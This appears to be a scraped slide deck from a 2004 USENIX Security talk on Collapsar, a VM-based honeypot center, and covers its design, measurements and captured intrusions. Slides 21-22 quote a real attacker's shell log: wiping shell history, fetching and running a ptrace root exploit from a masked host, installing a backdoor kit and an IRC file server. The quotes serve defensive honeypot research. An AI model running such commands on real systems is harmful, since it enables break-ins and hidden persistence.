![Page 1: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/1.jpg)
Collapsar: A VM-Based Architecture for Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences Center for Education and Research in Information
Assurance and Security (CERIAS) Purdue University
USENIX Security 2004USENIX Security 2004
![Page 2: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/2.jpg)
Outline
Motivation Collapsar architecture and features Collapsar design, implementation, and
performance Collapsar deployment and real-world
incidents Conclusion and on-going work
![Page 3: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/3.jpg)
Motivation
Need for network attack containment and monitoring Worm outbreaks (MSBlaster, Sasser…) Debian project servers hacked (Nov. 2003) PlanetLab nodes compromised (Dec. 2003) And more
![Page 4: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/4.jpg)
Motivation
Promise of honeypots Providing insights into intruders’
motivations, tactics, and tools Highly concentrated datasets w/ low noise Low false-positive and false negative rate
Discovering unknown vulnerabilities/exploitations Example: CERT advisory CA-2002-01 (solaris CDE
subprocess control daemon – dtspcd)
![Page 5: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/5.jpg)
Current Honeypot Operation
Individual honeypots Limited local view of attacks
Federation of distributed honeypots Deploying honeypots in different networks Exchanging logs and alerts
Problems Difficulties in distributed management Lack of honeypot expertise Inconsistency in security and management
policies Example: log format, sharing policy, exchange
frequency
![Page 6: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/6.jpg)
Our Solution: Collapsar
Based on the HoneyFarm idea of Lance Spitzner
Achieving two (seemingly) conflicting goals Distributed honeypot presence Centralized honeypot operation
Key ideas Leveraging unused IP addresses in each
network Diverting corresponding traffic to a
“detention” center (transparently) Creating VM-based honeypots in the center
![Page 7: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/7.jpg)
VM-based Honeypot
Collapsar Architecture
Redirector
Redirector Redirector
Correlation Engine
Management Station
Production Network
Production Network
Production Network
Collapsar Center
Attacker
Front-End
![Page 8: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/8.jpg)
Comparison with Current Approaches
Overlay-based approach (e.g., NetBait, Domino overlay) Honeypots deployed in different sites Logs aggregated from distributed honeypots Data mining performed on aggregated log
information Key difference: where the attacks take place (on-site vs. off-site)
![Page 9: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/9.jpg)
Comparison with Current Approaches
Sinkhole networking approach (e.g., iSink ) “Dark” space to monitor Internet
abnormality and commotion (e.g. msblaster worms)
Limited interaction for better scalability Key difference: contiguous large address
blocks (vs. scattered addresses)
![Page 10: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/10.jpg)
Comparison with Current Approaches
Low-interaction approach (e.g., honeyd, iSink ) Highly scalable deployment Low security risks Key difference: emulated services (vs. real
things) Less effective to reveal unknown vulnerabilities Less effective to capture 0-day worms
![Page 11: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/11.jpg)
Collapsar Design
Functional components Redirector Collapsar Front-End Virtual honeypots
Assurance modules Logging module Tarpitting module Correlation module
![Page 12: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/12.jpg)
Functional Components Redirector
Running in each participating network Capturing traffic toward unused IP addresses Redirecting to Collapsar Front-End
Two implementation options Proxy-ARP approach
Longer latency Minimum change to network infrastructure
GRE (Generic Routing Encapsulation) approach Lower latency Requiring router re-configuration Missing attack traffic from inside a domain
![Page 13: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/13.jpg)
Functional Components
Collapsar Front-End Dispatching incoming traffic to different
honeypots Transparent bridging
Mitigating security risks Transparent firewalling Packet re-writing
Assurance module plug-in Logging modules Tarpitting modules
![Page 14: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/14.jpg)
Functional Components
Virtual honeypots VM-based high-interaction honeypots
VMware Enhanced User-Mode Linux (UML)
Commodity OS and popular services Linux, Windows, Solaris, FreeBSD Apache, samba, sendmail, named
Capability of forensic analysis System image snapshot / restoration
![Page 15: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/15.jpg)
Assurance Modules Logging module
Traffic logging Where: Front-End and honeypots
Keystroke logging Where: honeypots
Tarpitting module Mitigating security risks
Where: Front-End
Correlation module Mining and correlation
(e.g., tcpdump, snort)(e.g., tcpdump, snort)
(e.g., sebek)(e.g., sebek)
(e.g., snort-inline)(e.g., snort-inline)
![Page 16: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/16.jpg)
Measurement set-up
Metrics TCP throughput
Nock (http://www.cs.wisc.edu/~zandy/p/nock) ICMP latency
Performance Measurement
Dell PowerEdge Server (2.6GHz Xeon/2GB Memory)
Dell PowerEdge Server (2.6GHz Xeon/2GB Memory)Dell Desktop PC
(1.8GHz Pentium 4/768MB Memory)
Dell Desktop PC (1.8GHz Pentium 4/768MB Memory)
Collapsar Center
Collapsar Center
A
VMware or UMLVMware or UML
H
Redirector Front-End
![Page 17: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/17.jpg)
TCP throughputTCP throughput
Measurement Results
![Page 18: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/18.jpg)
Measurement Results
ICMP latencyICMP latency
![Page 19: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/19.jpg)
Collapsar Deployment
Deployed in a local environment for a two-month period in 2003
Traffic redirected from five networks Three wired LANs One wireless LAN One DSL network
~ 40 honeypots analyzed so far Internet worms (MSBlaster, Enbiei, Nachi ) Interactive intrusions (Apache, Samba) OS: Windows, Linux, Solaris, FreeBSD
![Page 20: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/20.jpg)
Incident: Apache Honeypot/VMware
Vulnerabilities Vul 1: Apache (CERT® CA-2002-17) Vul 2: Ptrace (CERT® VU-6288429)
Time-line Deployed: 23:44:03pm, 11/24/03 Compromised: 09:33:55am, 11/25/03
Attack monitoring Detailed log
http://www.cs.purdue.edu/homes/jiangx/collapsar
![Page 21: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/21.jpg)
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
1. Gaining a regular account: apache
2. Escalating to the root privilege
Incident: Apache Honeypot/VMware
![Page 22: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/22.jpg)
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
3. Installing a set of backdoors
4. Adding the ftp user and installing a
IRC-based ftp server
Incident: Apache Honeypot/VMware
![Page 23: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/23.jpg)
Incident: Windows XP Honeypot/VMware
Vulnerability RPC DCOM Vul.
(Microsoft Security Bulletin MS03-026)
Time-line Deployed: 22:10:00pm,
11/26/03 MSBlaster: 00:36:47am,
11/27/03 Enbiei: 01:48:57am,
11/27/03 Nachi: 07:03:55am,
11/27/03
![Page 24: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/24.jpg)
Log Correlation: Stepping Stoneiii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained
an ssh backdoor
iii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained
an ssh backdoor
xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd
xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd
![Page 25: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/25.jpg)
Log Correlation: Network Scanning
![Page 26: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/26.jpg)
Conclusions
A new architecture for attack containment and monitoring Distributed presence and centralized operation
of honeypots Good potential in attack correlation and log
mining Unique features
Aggregation of Scattered unused IP addresses Off-site (relative to participating networks) attack
occurrences and monitoring Real services for unknown vulnerability
revelation
![Page 27: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/27.jpg)
On-going Work
Integration into trusted server architectures (SODA and Poly2)
On-demand honeypot customization Collapsar center federation Scalability
Testbed for worm containment (coming soon)
![Page 28: Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and](https://reader035.vdocuments.mx/reader035/viewer/2022062516/56649d5a5503460f94a3aeb4/html5/thumbnails/28.jpg)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.eduURL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”